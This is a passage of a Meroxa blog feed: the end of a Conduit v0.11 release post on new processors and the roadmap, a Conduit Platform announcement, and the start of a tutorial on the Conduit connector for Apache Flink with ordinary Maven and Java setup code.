&lt;p&gt;We introduced a new processor called &lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt;, which can be used to send a record to the DLQ (&lt;a href=&quot;https://conduit.io/docs/features/dead-letter-queue/&quot;&gt;Dead Letter Queue&lt;/a&gt;) or fail the pipeline. It should always be used together with a &lt;a href=&quot;https://conduit.io/docs/processors/conditions&quot;&gt;condition&lt;/a&gt;; otherwise, all records reaching this processor will produce an error.&lt;/p&gt;
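&lt;p&gt;Conceptually, the condition acts as a gate in front of the processor: only matching records are errored, while the rest pass through untouched. A simplified sketch (illustrative types, not Conduit&apos;s actual processor API):&lt;/p&gt;

```go
package main

import "fmt"

type record struct {
	Metadata map[string]string
}

// process applies an error-style processor only to records matching the
// condition; without a condition, every record would be errored.
func process(recs []record, condition func(record) bool) (passed, errored []record) {
	for _, r := range recs {
		if condition(r) {
			errored = append(errored, r) // would go to the DLQ or fail the pipeline
		} else {
			passed = append(passed, r)
		}
	}
	return passed, errored
}

func main() {
	recs := []record{
		{Metadata: map[string]string{"source": "trusted"}},
		{Metadata: map[string]string{"source": "unknown"}},
	}
	passed, errored := process(recs, func(r record) bool {
		return r.Metadata["source"] == "unknown"
	})
	fmt.Println(len(passed), "passed,", len(errored), "sent to DLQ") // 1 passed, 1 sent to DLQ
}
```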
&lt;p&gt;Read more about the &lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt; processor &lt;a href=&quot;https://conduit.io/docs/processors/builtin/error&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;code class=&quot;language-text&quot;&gt;webhook.http&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;We added the ability to specify headers for the &lt;code class=&quot;language-text&quot;&gt;webhook.http&lt;/code&gt; processor.&lt;/p&gt;
&lt;p&gt;Read more about the &lt;code class=&quot;language-text&quot;&gt;webhook.http&lt;/code&gt; processor &lt;a href=&quot;https://conduit.io/docs/processors/builtin/webhook.http&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;code class=&quot;language-text&quot;&gt;field.convert&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;The &lt;code class=&quot;language-text&quot;&gt;field.convert&lt;/code&gt; processor can now convert data to a Go &lt;code class=&quot;language-text&quot;&gt;time.Time&lt;/code&gt; object. It supports converting Unix nano timestamps and RFC3339-formatted dates.&lt;/p&gt;
&lt;p&gt;Read more about the &lt;code class=&quot;language-text&quot;&gt;field.convert&lt;/code&gt; processor &lt;a href=&quot;https://conduit.io/docs/processors/builtin/field.convert&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;code class=&quot;language-text&quot;&gt;avro.encode&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;avro.decode&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;These processors previously required users to run an external schema registry and configure the connection string for each processor. Now, they have been updated to use Conduit’s schema registry, eliminating the need for an external service.&lt;/p&gt;
&lt;p&gt;Read more about the &lt;code class=&quot;language-text&quot;&gt;avro.encode&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;avro.decode&lt;/code&gt; processors &lt;a href=&quot;https://conduit.io/docs/processors/builtin/avro.encode&quot;&gt;here&lt;/a&gt; and &lt;a href=&quot;https://conduit.io/docs/processors/builtin/avro.decode&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;What’s next?&lt;/h2&gt;
&lt;p&gt;With the release of Conduit v0.11, we have reached an important milestone. However, there are still exciting features on the horizon. Here’s a glimpse of what’s coming next:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We plan to add more &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions/1559&quot;&gt;robust pipeline lifecycle management&lt;/a&gt; functionality directly into Conduit. Specifically, we will introduce the ability to configure a restart policy at the pipeline level in case of failures. This will enable recovery from transient errors, such as an external service being unreachable, even if the connector itself cannot handle such failures.&lt;/li&gt;
&lt;li&gt;We acknowledge that the Conduit UI has lagged behind the features we&apos;ve added over the past two years, limiting access to Conduit&apos;s full potential. Our focus has instead been on improving Conduit&apos;s internal capabilities and on configuring them through configuration files. We believe Conduit is most useful as a tool that can be automated and configured programmatically, so we plan to remove the UI from Conduit entirely. In its place, we will add powerful &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions/1642&quot;&gt;CLI commands&lt;/a&gt; to simplify tasks such as bootstrapping new pipelines, exploring the contents of a running Conduit instance, and creating your own processors or connectors.&lt;/li&gt;
&lt;li&gt;We plan to refactor the API and introduce the ability to export and import pipelines into configuration files. This will enhance the integration between the API and configuration management, making it easier to manage and deploy pipelines.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We invite you to participate in shaping the Conduit roadmap by joining our &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub discussions&lt;/a&gt; or starting a new discussion yourself. Your feedback and ideas are crucial in helping us prioritize features that meet your needs.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Conduit v0.11 brings a host of new features and improvements that enhance the flexibility, usability, and performance of our &lt;a href=&quot;https://meroxa.com&quot;&gt;data streaming platform&lt;/a&gt;. From comprehensive schema support to robust connector and processor enhancements, this release is designed to make data integration more seamless and efficient. We encourage you to upgrade to the latest version and explore these new capabilities. As always, we welcome your feedback and contributions to help shape the future of Conduit. Get involved by joining our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord server&lt;/a&gt; and saying hello to the team behind Conduit!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Release Notes: Read the full &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.11.0&quot;&gt;release notes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Documentation: Explore the &lt;a href=&quot;https://docs.meroxa.com/getting-started/quickstart&quot;&gt;documentation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Announcing the New Conduit Platform by Meroxa]]></title><description><![CDATA[We are thrilled to introduce our latest offering, the Conduit Platform, which brings a host of new features and improvements designed to enhance your real-time data streaming experience, now powered by our robust Conduit open-source core.  This transformation brings enhanced performance, scalability, and usability, coupled with access to over 100 connectors maintained by our dedicated open-source community. Here’s a closer look at what’s new and how it can benefit your data operations.]]></description><link>https://meroxa.com/blog/announcing-the-new-conduit-platform-by-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/announcing-the-new-conduit-platform-by-meroxa</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Tue, 18 Jun 2024 13:03:06 GMT</pubDate><content:encoded>&lt;p&gt;We are thrilled to introduce our latest offering, the Conduit Platform, which brings a host of new features and improvements designed to enhance your real-time data streaming experience, now powered by our robust Conduit open-source core. This transformation brings enhanced performance, scalability, and usability, coupled with access to over 100 connectors maintained by our dedicated open-source community. Here’s a closer look at what’s new and how it can benefit your data operations.&lt;/p&gt;
&lt;h2&gt;Unparalleled Performance and Isolation&lt;/h2&gt;
&lt;p&gt;The new Conduit Platform features a modular architecture that ensures enhanced performance and comprehensive data isolation. Unlike the previous shared data plane model, this approach significantly reduces system disruptions and enhances reliability. This isolation guarantees that your data operations remain unaffected by other tenants, providing a smoother and more efficient user experience.&lt;/p&gt;
&lt;h2&gt;Accelerated Feature Delivery&lt;/h2&gt;
&lt;p&gt;We can now ship features more quickly and directly to our customers. This means you’ll have access to the latest advancements and improvements without the delays typically associated with shared infrastructure. Our commitment to continuous innovation ensures that your data integration and transformation capabilities are always at the cutting edge.&lt;/p&gt;
&lt;h2&gt;Simplified Data Application Building&lt;/h2&gt;
&lt;p&gt;We’ve listened to our customers who expressed the need to leverage Conduit’s powerful utilities without the complexity of YAML configurations and custom code. Our redesigned dashboard now enables you to build end-to-end real-time data applications with a user-friendly, no-code interface. This intuitive design allows you to focus on what matters most—leveraging your data—without getting bogged down in technical details.&lt;/p&gt;
&lt;h2&gt;Enhanced Team Features&lt;/h2&gt;
&lt;p&gt;The new Conduit Platform also includes a suite of features designed specifically for teams. These enhancements include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Basic Access Controls&lt;/strong&gt;: Manage who can access and modify your data applications with ease.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Secrets Management&lt;/strong&gt;: Securely store and manage sensitive information like API keys and passwords.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Single Sign-On (SSO)&lt;/strong&gt;: Simplify user authentication and enhance security with SSO integration.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And this is just the beginning—many more features are on the way to further empower your team and streamline your data operations.&lt;/p&gt;
&lt;h3&gt;Key Features&lt;/h3&gt;
&lt;h3&gt;Effortless Point and Click Real-Time Data Pipelines&lt;/h3&gt;
&lt;p&gt;Experience the ease of building real-time data pipelines with Conduit Platform. Our intuitive point-and-click interface allows you to quickly set up and manage your data flows without the need for extensive coding knowledge. Transform your data integration process into a seamless and efficient operation.&lt;/p&gt;
&lt;h3&gt;Connect Any Source to Any Destination&lt;/h3&gt;
&lt;p&gt;With Conduit Platform, you can effortlessly connect any data source to any destination. Whether it&apos;s databases, cloud services, or enterprise applications, our platform ensures smooth and reliable data transfer across your entire ecosystem. Break down data silos and achieve unified data access and insights.&lt;/p&gt;
&lt;h3&gt;Low Code Data Transformation&lt;/h3&gt;
&lt;p&gt;Simplify your data movement tasks with our low-code approach. Conduit Platform provides powerful tools that allow you to design and implement complex data transformations with minimal coding. Enhance your workflows and gain valuable insights faster and more efficiently.&lt;/p&gt;
&lt;h2&gt;Get Started Today&lt;/h2&gt;
&lt;p&gt;The all-new Conduit Platform represents a significant leap forward in data integration and transformation. With its isolated tenant model, accelerated feature delivery, and enhanced team features, it’s designed to meet the evolving needs of modern data-driven organizations.
Experience the future of data streaming with the Conduit Platform. Thank you for being a valued member of the Meroxa community. We look forward to supporting your success on this new and improved platform.&lt;/p&gt;
&lt;p&gt;Stay tuned for more updates and detailed guides on how to make the most of the Conduit Platform. If you have any questions or need assistance, click here to &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme?__hstc=259081301.6d5dc5950702ea18243d5eabeaba6872.1701109351374.1717020067958.1717083419376.75&amp;#x26;__hssc=259081301.2.1717083419376&amp;#x26;__hsfp=3065315178&quot;&gt;request a demo&lt;/a&gt;. Let&apos;s build the future of data integration together!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Introduction to Meroxa's New Conduit Connector for Apache Flink]]></title><description><![CDATA[Conduit connector for Apache Flink, a powerful combination that significantly expands Flink’s capabilities. Apache Flink is renowned for its robust stream processing capabilities, while Conduit offers a lightweight and fast data streaming solution, simplifying the creation of connectors. ]]></description><link>https://meroxa.com/blog/introduction-to-meroxas-new-conduit-connector-for-apache-flink</link><guid isPermaLink="false">https://meroxa.com/blog/introduction-to-meroxas-new-conduit-connector-for-apache-flink</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Mon, 17 Jun 2024 17:00:00 GMT</pubDate><content:encoded>&lt;p&gt;At Meroxa, we&apos;re excited to introduce the Conduit connector for Apache Flink, a powerful combination that significantly expands Flink’s capabilities. Apache Flink is renowned for its robust stream processing capabilities, while Conduit offers a lightweight and fast data streaming solution, simplifying the creation of connectors. By integrating these tools, we enhance the options available for real-time data processing.&lt;/p&gt;
&lt;h3&gt;How It Works&lt;/h3&gt;
&lt;p&gt;To leverage the robustness of Apache Flink’s Kafka connector, we have designed the Conduit connector to work seamlessly within Flink environments. Here’s a breakdown of the process:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Flink Source&lt;/strong&gt;: Represents a Conduit pipeline that reads from a data source and writes to a Kafka topic.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flink Job&lt;/strong&gt;: Processes data from the Kafka topic, transforming it as needed, and writes the processed data to another Kafka topic.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sink&lt;/strong&gt;: A Conduit pipeline reads data from the Kafka topic and writes it to the final destination.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://lh7-us.googleusercontent.com/docsz/AD_4nXf5tj-bx5SF4xLasiPMGVY-DqvZoPPaATfNrJfQ5HTTbwstI4Jm-K4izhzy8oHRll_KUw5zrkhputjl2uySZ8SZ8IyLEUnPHeGpfEd-crrBQXMWgLMVKXKnZ7CK5QQIsAC0eOb5QdZEXNgfQ5QGew1fcVs?key=di-HIY_HIDxgv9NmmVZt2Q&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Our Goal&lt;/h3&gt;
&lt;p&gt;To illustrate the capabilities, we&apos;ll demonstrate a job that reads data from Conduit’s &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;generator connector&lt;/a&gt;, adds metadata, and writes the data to a file.&lt;/p&gt;
&lt;h3&gt;Requirements&lt;/h3&gt;
&lt;p&gt;To get started, you’ll need the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Java 11 or higher&lt;/li&gt;
&lt;li&gt;Maven&lt;/li&gt;
&lt;li&gt;Conduit (refer to our &lt;a href=&quot;https://conduit.io/docs/introduction/getting-started/#installing&quot;&gt;documentation&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Kafka (ensure &lt;code class=&quot;language-text&quot;&gt;auto.create.topics.enable&lt;/code&gt; is set to true)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Setup&lt;/h3&gt;
&lt;p&gt;First, create a new Maven project and include the necessary dependencies:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;xml&quot;&gt;&lt;pre class=&quot;language-xml&quot;&gt;&lt;code class=&quot;language-xml&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;dependencies&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
   &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;dependency&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;groupId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;com.meroxa&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;groupId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;artifactId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;conduit-flink-connector&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;artifactId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;0.0.1-SNAPSHOT&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
   &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;dependency&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
   &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;dependency&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;groupId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;org.apache.flink&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;groupId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;artifactId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;flink-streaming-java&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;artifactId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;1.17.2&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
   &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;dependency&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
   &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;dependency&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;groupId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;org.apache.flink&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;groupId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;artifactId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;flink-connector-kafka&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;artifactId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;1.17.2&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
   &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;dependency&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;dependencies&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, write the main class and get a new execution environment for your Flink job:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;java&quot;&gt;&lt;pre class=&quot;language-java&quot;&gt;&lt;code class=&quot;language-java&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; env &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;StreamExecutionEnvironment&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;getExecutionEnvironment&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Adding a Source&lt;/h3&gt;
&lt;p&gt;Each Conduit source in an Apache Flink job maps to a connector on a running Conduit instance. In the &lt;code class=&quot;language-text&quot;&gt;conduit-flink-connector&lt;/code&gt;, this is represented with &lt;code class=&quot;language-text&quot;&gt;io.conduit.flink.ConduitSource&lt;/code&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;java&quot;&gt;&lt;pre class=&quot;language-java&quot;&gt;&lt;code class=&quot;language-java&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// (1) Used to correlate all the pipelines which are part of this app&lt;/span&gt;
&lt;span class=&quot;token class-name&quot;&gt;String&lt;/span&gt; appId &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;conduit-flink-demo&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;// (2) Create a new Conduit source&lt;/span&gt;
&lt;span class=&quot;token class-name&quot;&gt;KafkaSource&lt;/span&gt;&lt;span class=&quot;token generics&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;ConduitSource&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
   appId&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token comment&quot;&gt;// (3) Specify the plugin&lt;/span&gt;
   &lt;span class=&quot;token string&quot;&gt;&quot;generator&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token comment&quot;&gt;// (4) Configure the plugin&lt;/span&gt;
   &lt;span class=&quot;token class-name&quot;&gt;Map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;of&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;recordCount&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;format.type&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;structured&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;format.options.id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;int&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;format.options.name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;string&quot;&lt;/span&gt;
   &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
   &lt;span class=&quot;token comment&quot;&gt;// (5) Build a KafkaSource instance&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;buildKafkaSource&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Breaking It Down&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Application ID&lt;/strong&gt;: Specifies an ID for the Flink job. The Conduit connector uses this ID as part of the Conduit pipeline IDs it creates.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Create ConduitSource&lt;/strong&gt;: Instantiates a new &lt;strong&gt;ConduitSource&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Specify Connector&lt;/strong&gt;: Choose the &lt;a href=&quot;https://conduit.io/docs/connectors/getting-started&quot;&gt;Conduit connector&lt;/a&gt; to be used. Conduit comes with a few built-in connectors, and &lt;a href=&quot;https://conduit.io/docs/connectors/installing&quot;&gt;additional ones can be installed&lt;/a&gt;. In this case, we use the built-in &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;generator connector&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Configure Connector&lt;/strong&gt;: A connector’s configuration is usually documented in its &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator?tab=readme-ov-file#configuration&quot;&gt;README&lt;/a&gt;. The configuration here makes the connector produce one record with a structured payload containing two fields: an ID and a name.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Build KafkaSource&lt;/strong&gt;: Builds the &lt;strong&gt;KafkaSource&lt;/strong&gt; instance.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Writing a Map Transformation&lt;/h3&gt;
&lt;p&gt;Create a &lt;code class=&quot;language-text&quot;&gt;DataStream&lt;/code&gt; and add a map transformation to it. The transformation accepts an &lt;code class=&quot;language-text&quot;&gt;io.conduit.opencdc.Record&lt;/code&gt; and returns an &lt;code class=&quot;language-text&quot;&gt;io.conduit.opencdc.Record&lt;/code&gt;. Here, we add metadata to each record:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;java&quot;&gt;&lt;pre class=&quot;language-java&quot;&gt;&lt;code class=&quot;language-java&quot;&gt;&lt;span class=&quot;token class-name&quot;&gt;DataStream&lt;/span&gt;&lt;span class=&quot;token generics&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt; in &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;fromSource&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
     source&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
